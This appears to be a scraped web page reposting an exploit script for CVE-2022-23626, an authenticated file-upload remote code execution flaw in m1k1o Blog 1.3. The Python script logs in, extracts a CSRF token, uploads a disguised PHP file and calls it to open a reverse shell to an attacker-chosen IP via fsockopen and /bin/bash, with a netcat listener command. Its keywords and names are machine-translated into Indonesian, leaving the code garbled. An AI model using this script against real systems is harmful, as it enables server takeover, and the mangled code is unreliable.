Blog m1k1o 1.3 Eksekusi Kode Jarak Jauh

  • Whatsapp
WAGO 750-8xxx PLC Denial Of Service / User Enumeration
WAGO xxx PLC Denial Of Service User Enumeration

[*]News.nextcloud.asia

# Judul Eksploitasi: Blog m1k1o v.10 – Eksekusi Kode Jarak Jauh (RCE) (Diotentikasi)
# Tanggal: 2022-01-06
# Eksploitasi Penulis: Malte V
# Beranda Vendor: https://github.com/m1k1o/blog
# Tautan Perangkat Lunak: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Versi: 1.3 dan di bawah
# Diuji pada: Linux
#CVE : CVE-2022-23626

impor argparse
impor json
impor ulang
dari base64 impor b64encode
permintaan impor sebagai permintaan
dari bs4 impor BeautifulSoup

parser = argparse.ArgumentParser(description=’Kerentanan Unggah File RCE Terautentikasi untuk Blog m1k1o’)
parser.add_argument(‘-ip’, ‘–ip’, help=’alamat IP untuk shell terbalik’, type=str, default=”172.17.0.1″, diperlukan=False)
parser.add_argument(‘-u’, ‘–url’, help=’URL mesin tanpa awalan http://’, ​​type=str, default=”localhost”,
diperlukan=Salah)
parser.add_argument(‘-p’, ‘–port’, help=’Port untuk Blog’, type=int, default=8081,
diperlukan=Salah)
parser.add_argument(‘-lp’, ‘–lport’, help=’Mendengarkan port untuk shell terbalik’, type=int, default=9999,
diperlukan=Salah)
parser.add_argument(‘-U’, ‘–username’, help=’Username untuk pengguna Blog’, type=str, default=”username”, diperlukan=False)
parser.add_argument(‘-P’, ‘–password’, help=’Password for Blog user’, type=str, default=”password”, required=False)

args = vars(parser.parse_args())

nama pengguna = args[‘username’]
kata sandi = argumen[‘password’]
lhost_ip = args[‘ip’]
lhost_port = args[‘lport’]
alamat = args[‘url’]
pelabuhan = args[‘port’]
url = f”http://{alamat}:{port}”

blog_cookie = “”
csrf_token = “”
exploit_file_name = “”
kepala = {
“Tuan Rumah”: f”{alamat}”,
“Content-Type”: “multipart/form-data; batas=—————————13148889121752486353560141292”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0”,
“Terima”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v =b3;q=0,9”,
“X-Diminta-Dengan”: “XMLHttpRequest”,
“Csrf-Token”: f”{csrf_token}”,
“Cookie”: f”PHPSESSID={blog_cookie}”
}

def get_cookie(url_lengkap):
blog_cookie global
cookie_header = {}
jika bukan blog_cookie:
cookie_header[‘Cookie’] = f”PHPSESSID={blog_cookie}”
hasil = req.get(url=complete_url, headers=cookie_header)
jika result.status_code == 200:
blog_cookie = hasil.cookies.get_dict()[‘PHPSESSID’]
cetak (f'[+] Ditemukan PHPSESSID: {blog_cookie}’)
grep_csrf(hasil)

def grep_csrf(hasil):
csrf_token global
csrf_regex = r”[a-f0-9]{10}”
sup = BeautifulSoup(result.text, ‘html.parser’)
script_tag = str(sup.findAll(‘script’)[1].isi[0])
csrf_token = re.search(csrf_regex, script_tag).group(0)
cetak (f'[+] Ditemukan CSRF-Token: {csrf_token}’)

def login (nama pengguna, kata sandi):
get_cookie(url)
login_url = f”{url}/ajax.php”
login_data = f”action=login&nick={namapengguna}&pass={kata sandi}”
login_header = {
“Tuan Rumah”: f”{alamat}”,
“Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0”,
“Terima”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v =b3;q=0,9”,
“X-Diminta-Dengan”: “XMLHttpRequest”,
“Csrf-Token”: f”{csrf_token}”,
“Cookie”: f”PHPSESSID={blog_cookie}”
}
hasil = req.post(url=login_url, header=login_header, data=login_data)
sup = BeautifulSoup(result.text, ‘html.parser’)
login_content = json.loads(sup.teks)
jika login_content.get(‘logged_in’):
mencetak(‘[*] Login Berhasil’)
kalau tidak:
mencetak(‘[!] Login buruk’)

def set_cookie(hasil):
blog_cookie global
blog_cookie = hasil.cookies.get_dict()[‘PHPSESSID’]

def generate_payload(perintah):
kembali f”””
—————————–13148889121752486353560141292
Isi-Disposisi: formulir-data; nama=”berkas”; nama file=”malicious.gif.php”
Tipe Konten: application/x-httpd-php

GIF;
—————————–13148889121752486353560141292–
“””

def send_payload():
payload_header = {
“Tuan Rumah”: f”{alamat}”,
“Content-Type”: “multipart/form-data; batas=—————————13148889121752486353560141292”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0”,
“Terima”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v =b3;q=0,9”,
“X-Diminta-Dengan”: “XMLHttpRequest”,
“Csrf-Token”: f”{csrf_token}”,
“Cookie”: f”PHPSESSID={blog_cookie}”
}
upload_url = f”http://{address}:{port}/ajax.php?action=upload_image”
command = f”php -r ‘$sock=fsockopen(\”{lhost_ip}\”,{lhost_port});exec(\”/bin/bash <&3 >&3 2>&3\”);'”
payload = generate_payload(perintah)
cetak (p”[+] Unggah eksploit”)
hasil = req.post(url=upload_url, headers=payload_header, data=payload, proxy= {“http”: “http://127.0.0.1:8080”})
set_exploit_file_name(result.content.decode(‘ascii’))

def set_exploit_file_name(data):
exploit_file_name global
file_regex = r”[a-zA-Z0-9]{4,5}.php”
exploit_file_name = re.search(file_regex, data).group(0)

def call_malicious_php(nama_file):
tajuk global
complete_url = f”{url}/data/i/{file_name}”
mencetak(‘[*] Memanggil shell terbalik’)
hasil = req.get(url=complete_url)

def check_reverse_shell():
ya = {‘ya’, ‘y’, ‘kamu’, ”}
tidak = {‘tidak’, ‘n’}
choice = input(“Apakah Anda memiliki pendengar netcat yang aktif (y/Y atau t/T): “)
jika pilihan di ya:
kembali Benar
pilihan elif di no:
cetak (p”[!] Silakan buka pendengar netcat dengan \”nc -lnvp {lhost_port}\””)
kembali Salah

def utama():
diaktifkan_listener = check_reverse_shell()
jika diaktifkan_listener:
login (nama pengguna, kata sandi)
kirim_payload()
call_malicious_php(exploit_file_name)

jika __name__ == “__main__”:
utama()

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.